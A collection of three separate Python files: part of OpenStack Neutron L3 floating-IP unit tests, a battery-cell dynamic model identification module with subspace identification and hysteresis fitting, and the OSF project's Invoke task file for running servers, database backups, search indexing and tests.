ri.get_floating_ips = mock.Mock(return_value=[])
fip_statuses = ri.process_floating_ip_addresses(
mock.sentinel.interface_name)
self.assertIsNone(fip_statuses.get(fip_id))
def test_process_router_floating_ip_with_device_add_error(self, IPDevice):
IPDevice.return_value = device = mock.Mock(side_effect=RuntimeError)
device.addr.list.return_value = []
fip_id = _uuid()
fip = {
'id': fip_id, 'port_id': _uuid(),
'floating_ip_address': '15.1.2.3',
'fixed_ip_address': '192.168.0.2',
'status': 'DOWN'
}
ri = self._create_router()
ri.add_floating_ip = mock.Mock(
return_value=l3_constants.FLOATINGIP_STATUS_ERROR)
ri.get_floating_ips = mock.Mock(return_value=[fip])
fip_statuses = ri.process_floating_ip_addresses(
mock.sentinel.interface_name)
self.assertEqual({fip_id: l3_constants.FLOATINGIP_STATUS_ERROR},
fip_statuses)
# TODO(mrsmith): refactor for DVR cases
def test_process_floating_ip_addresses_remove(self, IPDevice):
IPDevice.return_value = device = mock.Mock()
device.addr.list.return_value = [{'cidr': '15.1.2.3/32'}]
ri = self._create_router()
ri.remove_floating_ip = mock.Mock()
ri.router.get = mock.Mock(return_value=[])
fip_statuses = ri.process_floating_ip_addresses(
mock.sentinel.interface_name)
self.assertEqual({}, fip_statuses)
ri.remove_floating_ip.assert_called_once_with(device, '15.1.2.3/32')
|
|
"""
Functions used by the dyn_model
"""
# Modules
# ------------------------------------------------------------------------------
import ipdb
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import fminbound, nnls, minimize_scalar
from scipy.signal import dlsim, dlti
from models import ModelDyn
# Functions
# ------------------------------------------------------------------------------
def OCVfromSOCtemp(soc, temp, model):
""" OCV function """
SOC = model.SOC # force to be column vector
OCV0 = model.OCV0 # force to be column vector
OCVrel = model.OCVrel # force to be column vector
# if soc is scalar then make it a vector
soccol = np.asarray(soc)
if soccol.ndim == 0:
soccol = soccol[None]
tempcol = temp * np.ones(np.size(soccol))
diffSOC = SOC[1] - SOC[0] # spacing between SOC points - assume uniform
ocv = np.zeros(np.size(soccol)) # initialize output to zero
I1, = np.where(soccol <= SOC[0]) # indices of socs below model-stored data
I2, = np.where(soccol >= SOC[-1]) # and of socs above model-stored data
I3, = np.where((soccol > SOC[0]) & (soccol < SOC[-1])) # the rest of them
I6 = np.isnan(soccol) # if input is "not a number" for any locations
# for voltages less than lowest stored soc datapoint, extrapolate off
# low end of table
if I1.any():
dv = (OCV0[1] + tempcol*OCVrel[1]) - (OCV0[0] + tempcol*OCVrel[0])
ocv[I1] = (soccol[I1] - SOC[0])*dv[I1]/diffSOC + OCV0[0] + tempcol[I1]*OCVrel[0]
# for voltages greater than highest stored soc datapoint, extrapolate off
# high end of table
if I2.any():
dv = (OCV0[-1] + tempcol*OCVrel[-1]) - (OCV0[-2] + tempcol*OCVrel[-2])
ocv[I2] = (soccol[I2] - SOC[-1])*dv[I2]/diffSOC + OCV0[-1] + tempcol[I2]*OCVrel[-1]
# for normal soc range, manually interpolate (10x faster than "interp1")
I4 = (soccol[I3] - SOC[0])/diffSOC # using linear interpolation
I5 = np.floor(I4)
I5 = I5.astype(int)
I45 = I4 - I5
omI45 = 1 - I45
ocv[I3] = OCV0[I5]*omI45 + OCV0[I5+1]*I45
ocv[I3] = ocv[I3] + tempcol[I3]*(OCVrel[I5]*omI45 + OCVrel[I5+1]*I45)
ocv[I6] = 0 # replace NaN SOCs with zero voltage
return ocv
def SISOsubid(y, u, n):
"""
Identify state-space "A" matrix from input-output data.
y: vector of measured outputs
u: vector of measured inputs
n: number of poles in solution
A: discrete-time state-space state-transition matrix.
Theory from "Subspace Identification for Linear Systems Theory - Implementation
- Applications" Peter Van Overschee / Bart De Moor (VODM) Kluwer Academic
Publishers, 1996. Combined algorithm: Figure 4.8 page 131 (robust). Robust
implementation: Figure 6.1 page 169.
Code adapted from "subid.m" in "Subspace Identification for Linear Systems"
toolbox on MATLAB CENTRAL file exchange, originally by Peter Van Overschee,
Dec. 1995
"""
ny = len(y)
i = 2*n
twoi = 4*n
# Determine the number of columns in the Hankel matrices
j = ny - twoi + 1
# Make Hankel matrices Y and U
Y = np.zeros((twoi, j))
U = np.zeros((twoi, j))
for k in range(2*i):
Y[k] = y[k:k+j]
U[k] = u[k:k+j]
# Compute the R factor
UY = np.concatenate((U, Y)) # combine U and Y into one array
_, r = np.linalg.qr(UY.T) # QR decomposition
R = r.T # transpose of upper triangle
# STEP 1: Calculate oblique and orthogonal projections
# ------------------------------------------------------------------
Rf = R[-i:] # future outputs
Rp = np.concatenate((R[:i], R[2*i:3*i])) # past inputs and outputs
Ru = R[i:twoi, :twoi] # future inputs
RfRu = np.linalg.lstsq(Ru.T, Rf[:, :twoi].T, rcond=None)[0].T
RfRuRu = RfRu.dot(Ru)
tm1 = Rf[:, :twoi] - RfRuRu
tm2 = Rf[:, twoi:4*i]
Rfp = np.concatenate((tm1, tm2), axis=1) # perpendicular future outputs
RpRu = np.linalg.lstsq(Ru.T, Rp[:, :twoi].T, rcond=None)[0].T
RpRuRu = RpRu.dot(Ru)
tm3 = Rp[:, :twoi] - RpRuRu
tm4 = Rp[:, twoi:4*i]
Rpp = np.concatenate((tm3, tm4), axis=1) # perpendicular past inputs and outputs
# The oblique projection is computed as (6.1) in VODM, page 166.
# obl/Ufp = Yf/Ufp * pinv(Wp/Ufp) * (Wp/Ufp)
# The extra projection on Ufp (Uf perpendicular) tends to give
# better numerical conditioning (see algo on VODM page 131)
# Funny rank check (SVD takes too long)
# This check is needed to avoid rank deficiency warnings
nmRpp = np.linalg.norm(Rpp[:, 3*i-3:-i], ord='fro')
if nmRpp < 1e-10:
# oblique projection as (Rfp*pinv(Rpp')') * Rp
Ob = Rfp.dot(np.linalg.pinv(Rpp.T).T).dot(Rp)
else:
# oblique projection as (Rfp/Rpp) * Rp
Ob = (np.linalg.lstsq(Rpp.T, Rfp.T, rcond=None)[0].T).dot(Rp)
# STEP 2: Compute weighted oblique projection and its SVD
# Extra projection of Ob on Uf perpendicular
# ------------------------------------------------------------------
ObRu = np.linalg.lstsq(Ru.T, Ob[:, :twoi].T, rcond=None)[0].T
ObRuRu = ObRu.dot(Ru)
tm5 = Ob[:, :twoi] - ObRuRu
tm6 = Ob[:, twoi:4*i]
WOW = np.concatenate((tm5, tm6), axis=1)
U, S, _ = np.linalg.svd(WOW, full_matrices=False)
ss = S # In np.linalg.svd S is already the diagonal, generally ss = diag(S)
# STEP 3: Partitioning U into U1 and U2 (the latter is not used)
# ------------------------------------------------------------------
U1 = U[:, :n] # determine U1
# STEP 4: Determine gam = Gamma(i) and gamm = Gamma(i-1)
# ------------------------------------------------------------------
gam = U1 @ np.diag(np.sqrt(ss[:n]))
gamm = gam[0:(i-1),:]
gam_inv = np.linalg.pinv(gam) # pseudo inverse of gam
gamm_inv = np.linalg.pinv(gamm) # pseudo inverse of gamm
# STEP 5: Determine A matrix (also C, which is not used)
# ------------------------------------------------------------------
tm7 = np.concatenate((gam_inv @ R[3*i:4*i, 0:3*i], np.zeros((n,1))), axis=1)
tm8 = R[i:twoi, 0:3*i+1]
Rhs = np.vstack((tm7, tm8))
tm9 = gamm_inv @ R[3*i+1:4*i, 0:3*i+1]
tm10 = R[3*i:3*i+1, 0:3*i+1]
Lhs = np.vstack((tm9, tm10))
sol = np.linalg.lstsq(Rhs.T, Lhs.T, rcond=None)[0].T # solve least squares for [A; C]
A = sol[0:n, 0:n] # extract A
return A
def minfn(data, model, theTemp, doHyst):
"""
Using an assumed value for gamma (already stored in the model), find optimum
values for remaining cell parameters, and compute the RMS error between true
and predicted cell voltage
"""
alltemps = [d.temp for d in data]
ind, = np.where(np.array(alltemps) == theTemp)[0]
G = abs(model.GParam[ind])
Q = abs(model.QParam[ind])
eta = abs(model.etaParam[ind])
RC = abs(model.RCParam[ind])
numpoles = len(RC)
ik = data[ind].s1.current.copy()
vk = data[ind].s1.voltage.copy()
tk = np.arange(len(vk))
etaik = ik.copy()
etaik[ik < 0] = etaik[ik < 0] * eta
hh = 0*ik
sik = 0*ik
fac = np.exp(-abs(G * etaik/(3600*Q)))
for k in range(1, len(ik)):
hh[k] = (fac[k-1]*hh[k-1]) - ((1-fac[k-1])*np.sign(ik[k-1]))
sik[k] = np.sign(ik[k])
if abs(ik[k]) < Q/100:
sik[k] = sik[k-1]
# First modeling step: Compute error with model = OCV only
vest1 = data[ind].OCV
verr = vk - vest1
# Second modeling step: Compute time constants in "A" matrix
y = -np.diff(verr)
u = np.diff(etaik)
A = SISOsubid(y, u, numpoles)
# Modify results to ensure real, preferably distinct, between 0 and 1
eigA = np.linalg.eigvals(A)
eigAr = eigA + 0.001 * np.random.normal(loc=0.0, scale=1.0, size=eigA.shape)
eigA[eigA != np.conj(eigA)] = abs(eigAr[eigA != np.conj(eigA)]) # Make sure real
eigA = np.real(eigA) # Make sure real
eigA[eigA<0] = abs(eigA[eigA<0]) # Make sure in range
eigA[eigA>1] = 1 / eigA[eigA>1]
RCfact = np.sort(eigA)
RCfact = RCfact[-numpoles:]
RC = -1 / np.log(RCfact)
# Compute RC time constants as Plett's Matlab ESCtoolbox
# nup = numpoles
# while 1:
# A = SISOsubid(y, u, nup)
# # Modify results to ensure real, preferably distinct, between 0 and 1
# eigA = np.linalg.eigvals(A)
# eigA = np.real(eigA[eigA == np.conj(eigA)]) # Make sure real
# eigA = eigA[(eigA>0) & (eigA<1)] # Make sure in range
# okpoles = len(eigA)
# nup = nup + 1
# if okpoles >= numpoles:
# break
# # print(nup)
# RCfact = np.sort(eigA)
# RCfact = RCfact[-numpoles:]
# RC = -1 / np.log(RCfact)
# Simulate the R-C filters to find R-C currents
stsp = dlti(np.diag(RCfact), np.vstack(1-RCfact), np.eye(numpoles), np.zeros((numpoles, 1)))
[tout, vrcRaw, xout] = dlsim(stsp, etaik)
# Third modeling step: Hysteresis parameters
if doHyst:
H = np.column_stack((hh, sik, -etaik, -vrcRaw))
W = nnls(H, verr)
M = W[0][0]
M0 = W[0][1]
R0 = W[0][2]
Rfact = W[0][3:].T
else:
H = np.column_stack((-etaik, -vrcRaw))
W = np.linalg.lstsq(H,verr, rcond=None)[0]
M = 0
M0 = 0
R0 = W[0]
Rfact = W[1:].T
idx, = np.where(np.array(model.temps) == data[ind].temp)[0]
model.R0Param[idx] = R0
model.M0Param[idx] = M0
model.MParam[idx] = M
model.RCParam[idx] = RC.T
model.RParam[idx] = Rfact.T
vest2 = vest1 + M*hh + M0*sik - R0*etaik - vrcRaw @ Rfact.T
verr = vk - vest2
# plot voltages
plt.figure(1)
plt.plot(tk[::10]/60, vk[::10], label='voltage')
plt.plot(tk[::10]/60, vest1[::10], label='vest1 (OCV)')
plt.plot(tk[::10]/60, vest2[::10], label='vest2 (DYN)')
plt.xlabel('Time (min)')
plt.ylabel('Voltage (V)')
plt.title(f'Voltage and estimates at T = {data[ind].temp} C')
plt.legend(loc='best', numpoints=1)
#plt.show()
# plot modeling errors
plt.figure(2)
plt.plot(tk[::10]/60, verr[::10], label='verr')
plt.xlabel('Time (min)')
plt.ylabel('Error (V)')
plt.title(f'Modeling error at T = {data[ind].temp} C')
#plt.show()
# Compute RMS error only on data roughly in 5% to 95% SOC
v1 = OCVfromSOCtemp(0.95, data[ind].temp, model)[0]
v2 = OCVfromSOCtemp(0.05, data[ind].temp, model)[0]
N1 = np.where(vk < v1)[0][0]
N2 = np.where(vk < v2)[0][0]
rmserr = np.sqrt(np.mean(verr[N1:N2]**2))
cost = np.sum(rmserr)
print(f'RMS error = {cost*1000:.2f} mV')
return cost, model
def optfn(x, data, model, theTemp, doHyst):
"""
This minfn works for the enhanced self-correcting cell model
"""
idx, = np.where(np.array(model.temps) == theTemp)
model.GParam[idx] = abs(x)
cost, _ = minfn(data, model, theTemp, doHyst)
return cost
def processDynamic(data, modelocv, numpoles, doHyst):
"""
Technical note: PROCESSDYNAMIC assumes that specific Arbin test scripts have
been executed to generate the input files. "makeMATfiles.m" converts the raw
Excel data files into "MAT" format where the MAT files have fields for time,
step, current, voltage, chgAh, and disAh for each script run.
The results from three scripts are required at every temperature.
The steps in each script file are assumed to be:
Script 1 (thermal chamber set to test temperature):
Step 1: Rest @ 100% SOC to acclimatize to test temperature
Step 2: Discharge @ 1C to reach ca. 90% SOC
Step 3: Repeatedly execute dynamic profiles (and possibly intermediate
rests) until SOC is around 10%
Script 2 (thermal chamber set to 25 degC):
Step 1: Rest ca. 10% SOC to acclimatize to 25 degC
Step 2: Discharge to min voltage (ca. C/3)
Step 3: Rest
Step 4: Constant voltage at vmin until current small (ca. C/30)
Steps 5-7: Dither around vmin
Step 8: Rest
Script 3 (thermal chamber set to 25 degC):
Step 2: Charge @ 1C to max voltage
Step 3: Rest
Step 4: Constant voltage at vmax until current small (ca. C/30)
Steps 5-7: Dither around vmax
Step 8: Rest
All other steps (if present) are ignored by PROCESSDYNAMIC. The time step
between data samples must be uniform -- we assume a 1s sample period in this
code.
The inputs:
- data: An array, with one entry per temperature to be processed.
One of the array entries must be at 25 degC. The fields of "data" are:
temp (the test temperature), script1, script 2, and script 3, where the
latter comprise data collected from each script. The sub-fields of
these script structures that are used by PROCESSDYNAMIC are the
vectors: current, voltage, chgAh, and disAh
- model: The output from processOCV, comprising the OCV model
- numpoles: The number of R-C pairs in the model
- doHyst: 0 if no hysteresis model desired; 1 if hysteresis desired
The output:
- model: A modified model, which now contains the dynamic fields filled in.
"""
# used by minimize_scalar later on
options = {
'xatol': 1e-08,
'maxiter': 1e5,
'disp': 0
}
# Step 1: Compute capacity and coulombic efficiency for every test
# ------------------------------------------------------------------
alltemps = [d.temp for d in data]
alletas = np.zeros(len(alltemps))
allQs = np.zeros(len(alltemps))
ind25, = np.where(np.array(alltemps) == 25)[0]
not25, = np.where(np.array(alltemps) != 25)
k = ind25
totDisAh = data[k].s1.disAh[-1] + data[k].s2.disAh[-1] + data[k].s3.disAh[-1]
totChgAh = data[k].s1.chgAh[-1] + data[k].s2.chgAh[-1] + data[k].s3.chgAh[-1]
eta25 = totDisAh/totChgAh
data[k].eta = eta25
alletas[k] = eta25
data[k].s1.chgAh = data[k].s1.chgAh * eta25
data[k].s2.chgAh = data[k].s2.chgAh * eta25
data[k].s3.chgAh = data[k].s3.chgAh * eta25
Q25 = data[k].s1.disAh[-1] + data[k].s2.disAh[-1] - data[k].s1.chgAh[-1] - data[k].s2.chgAh[-1]
data[k].Q = Q25
allQs[k] = Q25
eta25 = np.mean(alletas[ind25])
for k in not25:
data[k].s2.chgAh = data[k].s2.chgAh*eta25
data[k].s3.chgAh = data[k].s3.chgAh*eta25
eta = (data[k].s1.disAh[-1] + data[k].s2.disAh[-1] + data[k].s3.disAh[-1] - data[k].s2.chgAh[-1] - data[k].s3.chgAh[-1])/data[k].s1.chgAh[-1]
data[k].s1.chgAh = eta*data[k].s1.chgAh
data[k].eta = eta
alletas[k] = eta
Q = data[k].s1.disAh[-1] + data[k].s2.disAh[-1] - data[k].s1.chgAh[-1] - data[k].s2.chgAh[-1]
data[k].Q = Q
allQs[k] = Q
modeldyn = ModelDyn()
modeldyn.temps = alltemps
modeldyn.etaParam = alletas
modeldyn.QParam = allQs
# Step 2: Compute OCV for "discharge portion" of test
# ------------------------------------------------------------------
for k, _ in enumerate(data):
etaParam = modeldyn.etaParam[k]
etaik = data[k].s1.current.copy()
etaik[etaik < 0] = etaParam*etaik[etaik < 0]
data[k].Z = 1 - np.cumsum(etaik) * 1/(data[k].Q * 3600)
data[k].OCV = OCVfromSOCtemp(data[k].Z, alltemps[k], modelocv)
# Step 3: Now, optimize!
# ------------------------------------------------------------------
modeldyn.GParam = np.zeros(len(modeldyn.temps)) # gamma hysteresis parameter
modeldyn.M0Param = np.zeros(len(modeldyn.temps)) # M0 hysteresis parameter
modeldyn.MParam = np.zeros(len(modeldyn.temps)) # M hysteresis parameter
modeldyn.R0Param = np.zeros(len(modeldyn.temps)) # R0 ohmic resistance parameter
modeldyn.RCParam = np.zeros((len(modeldyn.temps), numpoles)) # time constant
modeldyn.RParam = np.zeros((len(modeldyn.temps), numpoles)) # Rk
modeldyn.SOC = modelocv.SOC # copy SOC values from OCV model
modeldyn.OCV0 = modelocv.OCV0 # copy OCV0 values from OCV model
modeldyn.OCVrel = modelocv.OCVrel # copy OCVrel values from OCV model
for theTemp in range(len(modeldyn.temps)):
temp = modeldyn.temps[theTemp]
print('Processing temperature', temp, 'C')
if doHyst:
g = abs(minimize_scalar(optfn, bounds=(1, 250), args=(data, modeldyn, temp, doHyst), method='bounded', options=options).x)
print('g =', g)
else:
modeldyn.GParam[theTemp] = 0
theGParam = 0
optfn(theGParam, data, modeldyn, temp, doHyst)
return modeldyn
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Invoke tasks. To run a task, run ``$ invoke <COMMAND>``. To see a list of
commands, run ``$ invoke --list``.
"""
import os
import sys
import code
import platform
import subprocess
import logging
from invoke import task, run
from website import settings
logging.getLogger('invoke').setLevel(logging.CRITICAL)
HERE = os.path.dirname(os.path.abspath(__file__))
WHEELHOUSE_PATH = os.environ.get('WHEELHOUSE')
def get_bin_path():
"""Get parent path of current python binary.
"""
return os.path.dirname(sys.executable)
def bin_prefix(cmd):
"""Prefix command with current binary path.
"""
return os.path.join(get_bin_path(), cmd)
try:
__import__('rednose')
except ImportError:
TEST_CMD = 'nosetests'
else:
TEST_CMD = 'nosetests --rednose'
@task
def server(host=None, port=5000, debug=True, live=False):
"""Run the app server."""
from website.app import init_app
app = init_app(set_backends=True, routes=True)
settings.API_SERVER_PORT = port
if live:
from livereload import Server
server = Server(app.wsgi_app)
server.watch(os.path.join(HERE, 'website', 'static', 'public'))
server.serve(port=port)
else:
app.run(host=host, port=port, debug=debug, threaded=debug, extra_files=[settings.ASSET_HASH_PATH])
@task
def apiserver(port=8000, live=False):
"""Run the API server."""
cmd = 'python manage.py runserver {}'.format(port)
if live:
cmd += ' livereload'
run(cmd, echo=True, pty=True)
SHELL_BANNER = """
{version}
+--------------------------------------------------+
|cccccccccccccccccccccccccccccccccccccccccccccccccc|
|ccccccccccccccccccccccOOOOOOOccccccccccccccccccccc|
|ccccccccccccccccccccOOOOOOOOOOcccccccccccccccccccc|
|cccccccccccccccccccOOOOOOOOOOOOccccccccccccccccccc|
|cccccccccOOOOOOOcccOOOOOOOOOOOOcccOOOOOOOccccccccc|
|cccccccOOOOOOOOOOccOOOOOsssOOOOcOOOOOOOOOOOccccccc|
|ccccccOOOOOOOOOOOOccOOssssssOOccOOOOOOOOOOOccccccc|
|ccccccOOOOOOOOOOOOOcOssssssssOcOOOOOOOOOOOOOcccccc|
|ccccccOOOOOOOOOOOOsOcOssssssOOOOOOOOOOOOOOOccccccc|
|cccccccOOOOOOOOOOOssccOOOOOOcOssOOOOOOOOOOcccccccc|
|cccccccccOOOOOOOsssOccccccccccOssOOOOOOOcccccccccc|
|cccccOOOccccOOssssOccccccccccccOssssOccccOOOcccccc|
|ccOOOOOOOOOOOOOccccccccccccccccccccOOOOOOOOOOOOccc|
|cOOOOOOOOssssssOcccccccccccccccccOOssssssOOOOOOOOc|
|cOOOOOOOssssssssOccccccccccccccccOsssssssOOOOOOOOc|
|cOOOOOOOOsssssssOccccccccccccccccOsssssssOOOOOOOOc|
|cOOOOOOOOOssssOOccccccccccccccccccOsssssOOOOOOOOcc|
|cccOOOOOOOOOOOOOOOccccccccccccccOOOOOOOOOOOOOOOccc|
|ccccccccccccOOssssOOccccccccccOssssOOOcccccccccccc|
|ccccccccOOOOOOOOOssOccccOOcccOsssOOOOOOOOccccccccc|
|cccccccOOOOOOOOOOOsOcOOssssOcOssOOOOOOOOOOOccccccc|
|ccccccOOOOOOOOOOOOOOOsssssssOcOOOOOOOOOOOOOOcccccc|
|ccccccOOOOOOOOOOOOOcOssssssssOcOOOOOOOOOOOOOcccccc|
|ccccccOOOOOOOOOOOOcccOssssssOcccOOOOOOOOOOOccccccc|
|ccccccccOOOOOOOOOcccOOOOOOOOOOcccOOOOOOOOOcccccccc|
|ccccccccccOOOOcccccOOOOOOOOOOOcccccOOOOccccccccccc|
|ccccccccccccccccccccOOOOOOOOOOcccccccccccccccccccc|
|cccccccccccccccccccccOOOOOOOOOcccccccccccccccccccc|
|cccccccccccccccccccccccOOOOccccccccccccccccccccccc|
|cccccccccccccccccccccccccccccccccccccccccccccccccc|
+--------------------------------------------------+
Welcome to the OSF Python Shell. Happy hacking!
Available variables:
{context}
"""
def make_shell_context():
from modularodm import Q
from framework.auth import User, Auth
from framework.mongo import database
from website.app import init_app
from website.project.model import Node
from website import models # all models
from website import settings
import requests
app = init_app()
context = {
'app': app,
'db': database,
'User': User,
'Auth': Auth,
'Node': Node,
'Q': Q,
'models': models,
'run_tests': test,
'rget': requests.get,
'rpost': requests.post,
'rdelete': requests.delete,
'rput': requests.put,
'settings': settings,
}
try: # Add a fake factory for generating fake names, emails, etc.
from faker import Factory
fake = Factory.create()
context['fake'] = fake
except ImportError:
pass
return context
def format_context(context):
lines = []
for name, obj in context.items():
line = "{name}: {obj!r}".format(**locals())
lines.append(line)
return '\n'.join(lines)
# Shell command adapted from Flask-Script. See NOTICE for license info.
@task
def shell():
context = make_shell_context()
banner = SHELL_BANNER.format(version=sys.version,
context=format_context(context)
)
try:
try:
# 0.10.x
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed(banner=banner)
ipshell(global_ns={}, local_ns=context)
except ImportError:
# 0.12+
from IPython import embed
embed(banner1=banner, user_ns=context)
return
except ImportError:
pass
# fallback to basic python shell
code.interact(banner, local=context)
return
@task(aliases=['mongo'])
def mongoserver(daemon=False, config=None):
"""Run the mongod process.
"""
if not config:
platform_configs = {
'darwin': '/usr/local/etc/tokumx.conf', # default for homebrew install
'linux': '/etc/tokumx.conf',
}
platform = str(sys.platform).lower()
config = platform_configs.get(platform)
port = settings.DB_PORT
cmd = 'mongod --port {0}'.format(port)
if config:
cmd += ' --config {0}'.format(config)
if daemon:
cmd += " --fork"
run(cmd, echo=True)
@task(aliases=['mongoshell'])
def mongoclient():
"""Run the mongo shell for the OSF database."""
db = settings.DB_NAME
port = settings.DB_PORT
run("mongo {db} --port {port}".format(db=db, port=port), pty=True)
@task
def mongodump(path):
"""Back up the contents of the running OSF database"""
db = settings.DB_NAME
port = settings.DB_PORT
cmd = "mongodump --db {db} --port {port} --out {path}".format(
db=db,
port=port,
path=path,
pty=True)
if settings.DB_USER:
cmd += ' --username {0}'.format(settings.DB_USER)
if settings.DB_PASS:
cmd += ' --password {0}'.format(settings.DB_PASS)
run(cmd, echo=True)
print()
print("To restore from the dumped database, run `invoke mongorestore {0}`".format(
os.path.join(path, settings.DB_NAME)))
@task
def mongorestore(path, drop=False):
"""Restores the running OSF database with the contents of the database at
the location given its argument.
By default, the contents of the specified database are added to
the existing database. The `--drop` option will cause the existing database
to be dropped.
A caveat: if you `invoke mongodump {path}`, you must restore with
`invoke mongorestore {path}/{settings.DB_NAME}, as that's where the
database dump will be stored.
"""
db = settings.DB_NAME
port = settings.DB_PORT
cmd = "mongorestore --db {db} --port {port}".format(
db=db,
port=port,
pty=True)
if settings.DB_USER:
cmd += ' --username {0}'.format(settings.DB_USER)
if settings.DB_PASS:
cmd += ' --password {0}'.format(settings.DB_PASS)
if drop:
cmd += " --drop"
cmd += " " + path
run(cmd, echo=True)
@task
def sharejs(host=None, port=None, db_host=None, db_port=None, db_name=None, cors_allow_origin=None):
"""Start a local ShareJS server."""
if host:
os.environ['SHAREJS_SERVER_HOST'] = host
if port:
os.environ['SHAREJS_SERVER_PORT'] = port
if db_host:
os.environ['SHAREJS_DB_HOST'] = db_host
if db_port:
os.environ['SHAREJS_DB_PORT'] = db_port
if db_name:
os.environ['SHAREJS_DB_NAME'] = db_name
if cors_allow_origin:
os.environ['SHAREJS_CORS_ALLOW_ORIGIN'] = cors_allow_origin
if settings.SENTRY_DSN:
os.environ['SHAREJS_SENTRY_DSN'] = settings.SENTRY_DSN
share_server = os.path.join(settings.ADDON_PATH, 'wiki', 'shareServer.js')
run("node {0}".format(share_server))
@task(aliases=['celery'])
def celery_worker(level="debug"):
"""Run the Celery process."""
# beat sets up a cron, refer to website/settings/celeryconfig
cmd = 'celery worker -A framework.tasks -l {0} --beat'.format(level)
run(bin_prefix(cmd))
@task
def rabbitmq():
"""Start a local rabbitmq server.
NOTE: this is for development only. The production environment should start
the server as a daemon.
"""
run("rabbitmq-server", pty=True)
@task(aliases=['elastic'])
def elasticsearch():
"""Start a local elasticsearch server
NOTE: Requires that elasticsearch is installed. See README for instructions
"""
import platform
if platform.linux_distribution()[0] == 'Ubuntu':
run("sudo service elasticsearch start")
elif platform.system() == 'Darwin': # Mac OSX
run('elasticsearch')
else:
print("Your system is not recognized, you will have to start elasticsearch manually")
@task
def migrate_search(delete=False, index=settings.ELASTIC_INDEX):
"""Migrate the search-enabled models."""
from website.search_migration.migrate import migrate
migrate(delete, index=index)
@task
def rebuild_search():
"""Delete and recreate the index for elasticsearch"""
run("curl -s -XDELETE {uri}/{index}*".format(uri=settings.ELASTIC_URI,
index=settings.ELASTIC_INDEX))
run("curl -s -XPUT {uri}/{index}".format(uri=settings.ELASTIC_URI,
index=settings.ELASTIC_INDEX))
migrate_search()
@task
def mailserver(port=1025):
"""Run a SMTP test server."""
cmd = 'python -m smtpd -n -c DebuggingServer localhost:{port}'.format(port=port)
run(bin_prefix(cmd), pty=True)
@task
def jshint():
"""Run JSHint syntax check"""
js_folder = os.path.join(HERE, 'website', 'static', 'js')
cmd = 'jshint {}'.format(js_folder)
run(cmd, echo=True)
@task(aliases=['flake8'])
def flake():
run('flake8 .', echo=True)
def pip_install(req_file):
"""Return the proper 'pip install' command for installing the dependencies
defined in ``req_file``.
"""
cmd = bin_prefix('pip install --exists-action w --upgrade -r {} '.format(req_file))
if WHEELHOUSE_PATH:
cmd += ' --no-index --find-links={}'.format(WHEELHOUSE_PATH)
return cmd
@task(aliases=['req'])
def requirements(addons=False, release=False, dev=False, metrics=False):
"""Install python dependencies.
Examples:
inv requirements --dev
inv requirements --addons
inv requirements --release
inv requirements --metrics
"""
if release or addons:
addon_requirements()
# "release" takes precedence
if release:
req_file = os.path.join(HERE, 'requirements', 'release.txt')
elif dev: # then dev requirements
req_file = os.path.join(HERE, 'requirements', 'dev.txt')
elif metrics: # then dev requirements
req_file = os.path.join(HERE, 'requirements', 'metrics.txt')
else: # then base requirements
req_file = os.path.join(HERE, 'requirements.txt')
run(pip_install(req_file), echo=True)
@task
def test_module(module=None, verbosity=2):
"""Helper for running tests.
"""
# Allow selecting specific submodule
module_fmt = ' '.join(module) if isinstance(module, list) else module
args = " --verbosity={0} -s {1}".format(verbosity, module_fmt)
# Use pty so the process buffers "correctly"
run(bin_prefix(TEST_CMD) + args, pty=True)
@task
def test_osf():
"""Run the OSF test suite."""
test_module(module="tests/")
@task
def test_addons():
"""Run all the tests in the addons directory.
"""
modules = []
for addon in settings.ADDONS_REQUESTED:
module = os.path.join(settings.BASE_PATH, 'addons', addon)
modules.append(module)
test_module(module=modules)
@task
def test(all=False, syntax=False):
"""
Run unit tests: OSF (always), plus addons and syntax checks (optional)
"""
if syntax:
flake()
jshint()
test_osf()
if all:
test_addons()
karma(single=True, browsers='PhantomJS')
@task
def karma(single=False, sauce=False, browsers=None):
"""Run JS tests with Karma. Requires Chrome to be installed."""
karma_bin = os.path.join(
HERE, 'node_modules', 'karma', 'bin', 'karma'
)
cmd = '{} start'.format(karma_bin)
if sauce:
cmd += ' karma.saucelabs.conf.js'
if single:
cmd += ' --single-run'
# Use browsers if specified on the command-line, otherwise default
# what's specified in karma.conf.js
if browsers:
cmd += ' --browsers {}'.format(browsers)
run(cmd, echo=True)
@task
def wheelhouse(addons=False, release=False, dev=False):
if release:
req_file = os.path.join(HERE, 'requirements', 'release.txt')
elif dev:
req_file = os.path.join(HERE, 'requirements', 'dev.txt')
else:
req_file = os.path.join(HERE, 'requirements.txt')
cmd = 'pip wheel --find-links={} -r {} --wheel-dir={}'.format(WHEELHOUSE_PATH, req_file, WHEELHOUSE_PATH)
run(cmd, pty=True)
if not addons:
return
for directory in os.listdir(settings.ADDON_PATH):
path = os.path.join(settings.ADDON_PATH, directory)
if os.path.isdir(path):
req_file = os.path.join(path, 'requirements.txt')
if os.path.exists(req_file):
cmd = 'pip wheel --find-links={} -r {} --wheel-dir={}'.format(WHEELHOUSE_PATH, req_file, WHEELHOUSE_PATH)
run(cmd, pty=True)
@task
def addon_requirements():
"""Install all addon requirements."""
for directory in os.listdir(settings.ADDON_PATH):
path = os.path.join(settings.ADDON_PATH, directory)
if os.path.isdir(path):
try:
requirements_file = os.path.join(path, 'requirements.txt')
open(requirements_file)
print('Installing requirements for {0}'.format(directory))
cmd = 'pip install --exists-action w --upgrade -r {0}'.format(requirements_file)
if WHEELHOUSE_PATH:
cmd += ' --no-index --find-links={}'.format(WHEELHOUSE_PATH)
run(bin_prefix(cmd))
except IOError:
pass
print('Finished')
@task
def encryption(owner=None):
"""Generate GnuPG key.
For local development:
> invoke encryption
On Linode:
> sudo env/bin/invoke encryption --owner www-data
"""
if not settings.USE_GNUPG:
print('GnuPG is not enabled. No GnuPG key will be generated.')
return
import gnupg
gpg = gnupg.GPG(gnupghome=settings.GNUPG_HOME, gpgbinary=settings.GNUPG_BINARY)
keys = gpg.list_keys()
if keys:
print('Existing GnuPG key found')
return
print('Generating GnuPG key')
input_data = gpg.gen_key_input(name_real='OSF Generated Key')
gpg.gen_key(input_data)
if owner:
run('sudo chown -R {0} {1}'.format(owner, settings.GNUPG_HOME))
@task
def travis_addon_settings():
for directory in os.listdir(settings.ADDON_PATH):
path = os.path.join(settings.ADDON_PATH, directory, 'settings')
if os.path.isdir(path):
try:
open(os.path.join(path, 'local-travis.py'))
